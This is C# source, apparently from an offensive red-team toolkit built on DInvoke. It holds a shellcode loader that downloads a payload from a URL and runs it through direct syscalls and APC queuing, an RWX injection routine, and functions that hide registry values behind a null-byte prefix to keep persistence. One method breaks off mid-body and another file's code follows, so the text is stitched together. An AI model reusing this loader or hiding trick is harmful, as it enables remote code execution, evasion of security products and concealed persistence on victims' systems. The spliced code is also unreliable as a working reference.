public static Data.Native.NTSTATUS NTDeleteValueKey(IntPtr keyHandle, ref Data.Native.UNICODE_STRING valueName)
{
object[] funcargs =
{
keyHandle, valueName
};
Data.Native.NTSTATUS retvalue = (Data.Native.NTSTATUS)Generic.DynamicAPIInvoke(@"ntdll.dll", @"NtDeleteValueKey", typeof(DELEGATES.NtDeleteValueKey), ref funcargs);
return(retvalue);
}
public static Data.Native.NTSTATUS NtSetValueKey(IntPtr keyHandle, ref Data.Native.UNICODE_STRING valueName, int titleIndex, Data.Win32.WinNT.REGISTRY_TYPES type, IntPtr data, int dataSize)
{
object[] funcargs =
{
keyHandle, valueName, titleIndex, type, data, dataSize
};
Data.Native.NTSTATUS retvalue = (Data.Native.NTSTATUS)Generic.DynamicAPIInvoke(@"ntdll.dll", @"NtSetValueKey", typeof(DELEGATES.NtSetValueKey), ref funcargs);
return(retvalue);
}
public static string GetFilenameFromMemoryPointer(IntPtr hProc, IntPtr pMem)
{
// Alloc buffer for result struct
IntPtr pBase = IntPtr.Zero;
IntPtr RegionSize = (IntPtr)0x500;
IntPtr pAlloc = NtAllocateVirtualMemory(hProc, ref pBase, IntPtr.Zero, ref RegionSize, Data.Win32.Kernel32.MEM_COMMIT | Data.Win32.Kernel32.MEM_RESERVE, Data.Win32.WinNT.PAGE_READWRITE);
// Prepare NtQueryVirtualMemory parameters
Data.Native.MEMORYINFOCLASS memoryInfoClass = Data.Native.MEMORYINFOCLASS.MemorySectionName;
UInt32 MemoryInformationLength = 0x500;
UInt32 Retlen = 0;
// Craft an array for the arguments
object[] funcargs =
{
hProc, pMem, memoryInfoClass, pAlloc, MemoryInformationLength, Retlen
};
Data.Native.NTSTATUS retValue = (Data.Native.NTSTATUS)Generic.DynamicAPIInvoke(@"ntdll.dll", @"NtQueryVirtualMemory", typeof(DELEGATES.NtQueryVirtualMemory), ref funcargs);
string FilePath = string.Empty;
if (retValue == Data.Native.NTSTATUS.Success)
{
Data.Native.UNICODE_STRING sn = (Data.Native.UNICODE_STRING)Marshal.PtrToStructure(pAlloc, typeof(Data.Native.UNICODE_STRING));
FilePath = Marshal.PtrToStringUni(sn.Buffer);
}
// Free allocation
NtFreeVirtualMemory(hProc, ref pAlloc, ref RegionSize, Data.Win32.Kernel32.MEM_RELEASE);
if (retValue == Data.Native.NTSTATUS.AccessDenied)
{
// STATUS_ACCESS_DENIED
throw new UnauthorizedAccessException("Access is denied.");
}
if (retValue == Data.Native.NTSTATUS.AccessViolation)
{
// STATUS_ACCESS_VIOLATION
throw new InvalidOperationException("The specified base address is an invalid virtual address.");
}
if (retValue == Data.Native.NTSTATUS.InfoLengthMismatch)
{
// STATUS_INFO_LENGTH_MISMATCH
throw new InvalidOperationException("The MemoryInformation buffer is larger than MemoryInformationLength.");
}
if (retValue == Data.Native.NTSTATUS.InvalidParameter)
{
// STATUS_INVALID_PARAMETER
throw new InvalidOperationException("The specified base address is outside the range of accessible addresses.");
}
return(FilePath);
}
public static void RtlInitUnicodeString(ref Data.Native.UNICODE_STRING DestinationString, [MarshalAs(UnmanagedType.LPWStr)] string SourceString)
{
// Craft an array for the arguments
object[] funcargs =
{
DestinationString, SourceString
};
Generic.DynamicAPIInvoke(@"ntdll.dll", @"RtlInitUnicodeString", typeof(DELEGATES.RtlInitUnicodeString), ref funcargs);
// Update the modified variables
DestinationString = (Data.Native.UNICODE_STRING)funcargs[0];
}
public static void DRegHideManualMap(String hive = "HKCU", String subKey = @"\SOFTWARE", String keyName = "", String keyValue = "", bool hiddenKey = false, bool deleteKey = false)
{
DInvoke.Data.PE.PE_MANUAL_MAP mappedDLL = new DInvoke.Data.PE.PE_MANUAL_MAP();
mappedDLL = DInvoke.ManualMap.Map.MapModuleToMemory(@"C:\Windows\System32\ntdll.dll");
try
{
if (hive == "HKLM")
{
hive = @"\Registry\Machine";
}
else if (hive == "HKCU")
{
String sid = WindowsIdentity.GetCurrent().User.ToString();
hive = @"\Registry\User\" + sid;
}
else
{
throw new Exception("Hive needs to be either HKLM or HKCU");
}
if (hiddenKey)
{
keyName = "\0" + keyName;
}
String regKey = hive + subKey;
IntPtr keyHandle = IntPtr.Zero;
STRUCTS.OBJECT_ATTRIBUTES oa = new STRUCTS.OBJECT_ATTRIBUTES();
DInvoke.Data.Native.UNICODE_STRING UC_RegKey = new DInvoke.Data.Native.UNICODE_STRING();
string SID = WindowsIdentity.GetCurrent().User.ToString();
DInvoke.DynamicInvoke.Native.RtlInitUnicodeString(ref UC_RegKey, regKey);
IntPtr oaObjectName = Marshal.AllocHGlobal(Marshal.SizeOf(UC_RegKey));
Marshal.StructureToPtr(UC_RegKey, oaObjectName, true);
oa.Length = Marshal.SizeOf(oa);
oa.Attributes = (uint)STRUCTS.OBJ_ATTRIBUTES.CASE_INSENSITIVE;
oa.objectName = oaObjectName;
oa.SecurityDescriptor = IntPtr.Zero;
oa.SecurityQualityOfService = IntPtr.Zero;
DInvoke.Data.Native.NTSTATUS retValue = new DInvoke.Data.Native.NTSTATUS();
ref IntPtr rkeyHandle = ref keyHandle;
STRUCTS.ACCESS_MASK desiredAccess = STRUCTS.ACCESS_MASK.KEY_ALL_ACCESS;
ref STRUCTS.OBJECT_ATTRIBUTES roa = ref oa;
public static void Inject(byte[] shellcode)
{
IntPtr hmodule = IntPtr.Zero;
DInvoke.Data.Native.UNICODE_STRING bb = new DInvoke.Data.Native.UNICODE_STRING();
DInvoke.DynamicInvoke.Native.RtlInitUnicodeString(ref bb, @"C:\Windows\System32\ntdll.dll");
DInvoke.DynamicInvoke.Native.LdrLoadDll(IntPtr.Zero, 0, ref bb, ref hmodule);
List <DInvoke.DynamicInvoke.EAT> eat = DInvoke.DynamicInvoke.Generic.GetExportAddressEx(hmodule);
var dict = DInvoke.DynamicInvoke.EAT.ConvertToDict(eat);
IntPtr baseAddress = IntPtr.Zero;
var lpValue = Marshal.AllocHGlobal(IntPtr.Size);
Marshal.WriteIntPtr(lpValue, new IntPtr((long)shellcode.Length));
var id = dict[DInvoke.DynamicInvoke.EAT.GetSha256Hash("NtAllocateVirtualMemory")];
object[] allocateMemory = { (IntPtr)(-1), baseAddress, IntPtr.Zero, lpValue,
(uint)(DInvoke.Data.Win32.Kernel32.MemoryAllocationFlags.Reserve | DInvoke.Data.Win32.Kernel32.MemoryAllocationFlags.Commit),
(uint)DInvoke.Data.Win32.Kernel32.MemoryProtectionFlags.ExecuteReadWrite };
baseAddress = (IntPtr)executeSyscall(id, "NtAllocateVirtualMemory", allocateMemory)[1];
IntPtr buffer = Marshal.AllocHGlobal(shellcode.Length);
Marshal.Copy(shellcode, 0, buffer, shellcode.Length);
uint bytesWritten = 0;
object[] writeMemory = { (IntPtr)(-1), baseAddress, buffer, (uint)shellcode.Length, bytesWritten };
id = dict[DInvoke.DynamicInvoke.EAT.GetSha256Hash("NtWriteVirtualMemory")];
executeSyscall(id, "NtWriteVirtualMemory", writeMemory);
IntPtr hthread = IntPtr.Zero;
object[] createThread = { hthread, DInvoke.Data.Win32.WinNT.ACCESS_MASK.GENERIC_ALL, IntPtr.Zero, (IntPtr)(-1),
baseAddress, IntPtr.Zero, false, 0,0, 0, IntPtr.Zero };
id = dict[DInvoke.DynamicInvoke.EAT.GetSha256Hash("NtCreateThreadEx")];
executeSyscall(id, "NtCreateThreadEx", createThread);
}
static void Main(string[] args)
{
if (args.Length < 1)
{
printHelp();
return;
}
string url = args[0];
IntPtr hmodule = IntPtr.Zero;
hm = new HookManager();
DInvoke.Data.Native.UNICODE_STRING bb = new DInvoke.Data.Native.UNICODE_STRING();
DInvoke.DynamicInvoke.Native.RtlInitUnicodeString(ref bb, @"c:\windows\system32\ntdll.dll");
DInvoke.DynamicInvoke.Native.LdrLoadDll(IntPtr.Zero, 0, ref bb, ref hmodule);
List <DInvoke.DynamicInvoke.EAT> eat = DInvoke.DynamicInvoke.Generic.GetExportAddressEx(hmodule);
var dict = DInvoke.DynamicInvoke.EAT.ConvertToDict(eat);
byte[] sc = new System.Net.WebClient().DownloadData(url);
IntPtr baseAddr = IntPtr.Zero;
var lpValue = Marshal.AllocHGlobal(IntPtr.Size);
Marshal.WriteIntPtr(lpValue, new IntPtr((long)sc.Length));
var id = dict[DInvoke.DynamicInvoke.EAT.GetSha256Hash("NtAllocateVirtualMemory")];
object[] allocate = { (IntPtr)(-1), baseAddr, IntPtr.Zero, lpValue,
(uint)(DInvoke.Data.Win32.Kernel32.MemoryAllocationFlags.Reserve | DInvoke.Data.Win32.Kernel32.MemoryAllocationFlags.Commit),
(uint)DInvoke.Data.Win32.Kernel32.MemoryProtectionFlags.ReadWrite };
baseAddr = (IntPtr)Syscalls.executeSyscall(id, "NtAllocateVirtualMemory", allocate)[1];
IntPtr buffer = Marshal.AllocHGlobal(sc.Length);
Marshal.Copy(sc, 0, buffer, sc.Length);
uint bytesWritten = 0;
object[] write = { (IntPtr)(-1), baseAddr, buffer, (uint)sc.Length, bytesWritten };
id = dict[DInvoke.DynamicInvoke.EAT.GetSha256Hash("NtWriteVirtualMemory")];
Syscalls.executeSyscall(id, "NtWriteVirtualMemory", write);
uint oldProtect = 0;
object[] protection = { (IntPtr)(-1), baseAddr, lpValue, (uint)DInvoke.Data.Win32.Kernel32.MemoryProtectionFlags.ExecuteRead, oldProtect };
id = dict[DInvoke.DynamicInvoke.EAT.GetSha256Hash("NtProtectVirtualMemory")];
baseAddr = (IntPtr)Syscalls.executeSyscall(id, "NtProtectVirtualMemory", protection)[1];
object[] apc = { GetCurrentThread(), baseAddr, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero };
id = dict[DInvoke.DynamicInvoke.EAT.GetSha256Hash("NtQueueApcThread")];
Syscalls.executeSyscall(id, "NtQueueApcThread", apc);
// hm.Install(); I just wanted to hook GetProcAddress, but this is not usefull for the shellcode injection.
object[] alert = {};
id = dict[DInvoke.DynamicInvoke.EAT.GetSha256Hash("NtTestAlert")];
Syscalls.executeSyscall(id, "NtTestAlert", alert);
}
public static Data.Native.NTSTATUS LdrLoadDll(IntPtr PathToFile, UInt32 dwFlags, ref Data.Native.UNICODE_STRING ModuleFileName, ref IntPtr ModuleHandle)
{
// Craft an array for the arguments
object[] funcargs =
{
PathToFile, dwFlags, ModuleFileName, ModuleHandle
};
Data.Native.NTSTATUS retValue = (Data.Native.NTSTATUS)Generic.DynamicAPIInvoke(@"ntdll.dll", @"LdrLoadDll", typeof(DELEGATES.LdrLoadDll), ref funcargs);
// Update the modified variables
ModuleHandle = (IntPtr)funcargs[3];
return(retValue);
}
public static void DRegHide(String hive = "HKCU", String subKey = @"\SOFTWARE", String keyName = "", String keyValue = "", bool hiddenKey = false, bool deleteKey = false)
{
try
{
if (hive == "HKLM")
{
hive = @"\Registry\Machine";
}
else if (hive == "HKCU")
{
String sid = WindowsIdentity.GetCurrent().User.ToString();
hive = @"\Registry\User\" + sid;
}
else
{
throw new Exception("Hive needs to be either HKLM or HKCU");
}
if (hiddenKey)
{
keyName = "\0" + keyName;
}
String regKey = hive + subKey;
IntPtr keyHandle = IntPtr.Zero;
STRUCTS.OBJECT_ATTRIBUTES oa = new STRUCTS.OBJECT_ATTRIBUTES();
DInvoke.Data.Native.UNICODE_STRING UC_RegKey = new DInvoke.Data.Native.UNICODE_STRING();
string SID = WindowsIdentity.GetCurrent().User.ToString();
DInvoke.DynamicInvoke.Native.RtlInitUnicodeString(ref UC_RegKey, regKey);
IntPtr oaObjectName = Marshal.AllocHGlobal(Marshal.SizeOf(UC_RegKey));
Marshal.StructureToPtr(UC_RegKey, oaObjectName, true);
oa.Length = Marshal.SizeOf(oa);
oa.Attributes = (uint)STRUCTS.OBJ_ATTRIBUTES.CASE_INSENSITIVE;
oa.objectName = oaObjectName;
oa.SecurityDescriptor = IntPtr.Zero;
oa.SecurityQualityOfService = IntPtr.Zero;
DInvoke.Data.Native.NTSTATUS retValue = new DInvoke.Data.Native.NTSTATUS();
retValue = TinyDinvoke.NtOpenKey(ref keyHandle, STRUCTS.ACCESS_MASK.KEY_ALL_ACCESS, ref oa);
if (retValue == DInvoke.Data.Native.NTSTATUS.Success)
{
Console.WriteLine("Handle to " + hive + " succesfully opened!");
String keyValueName = keyName;
String keyValueData = keyValue;
DInvoke.Data.Native.UNICODE_STRING UC_RegKeyValueName = new DInvoke.Data.Native.UNICODE_STRING();
DInvoke.Data.Native.UNICODE_STRING UC_RegKeyValueData = new DInvoke.Data.Native.UNICODE_STRING();
if (!hiddenKey)
{
DInvoke.DynamicInvoke.Native.RtlInitUnicodeString(ref UC_RegKeyValueName, keyValueName);
}
else
{
UC_RegKeyValueName.Length = (ushort)(keyValueName.Length * 2);
UC_RegKeyValueName.MaximumLength = (ushort)(keyValueName.Length * 2);
UC_RegKeyValueName.Buffer = Marshal.StringToCoTaskMemUni(keyValueName);
}
DInvoke.DynamicInvoke.Native.RtlInitUnicodeString(ref UC_RegKeyValueData, keyValueData);
if (!deleteKey)
{
retValue = TinyDinvoke.NtSetValueKey(keyHandle, ref UC_RegKeyValueName, 0, STRUCTS.REGISTRY_TYPES.REG_SZ, UC_RegKeyValueData.Buffer, UC_RegKeyValueData.Length);
if (retValue == DInvoke.Data.Native.NTSTATUS.Success)
{
Console.WriteLine("RegKey successfully set");
}
}
else
{
retValue = TinyDinvoke.NtDeleteValueKey(keyHandle, ref UC_RegKeyValueName);
Console.WriteLine("key deletion status: " + retValue);
}
Marshal.FreeHGlobal(oa.objectName);
TinyDinvoke.NtClose(keyHandle);
}
else
{
Console.WriteLine("Regkey not found");
}
}
catch (Exception e)
{
Console.WriteLine(e.Message);
}
}
